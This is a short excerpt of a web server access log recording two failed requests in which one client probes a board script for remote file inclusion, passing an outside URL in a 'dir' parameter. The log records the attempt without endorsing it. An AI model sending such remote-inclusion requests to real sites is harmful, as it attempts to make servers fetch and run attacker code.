81.92.215.78 - - [01/Mar/2010:18:18:08 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.92.215.78 - - [01/Mar/2010:18:18:08 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
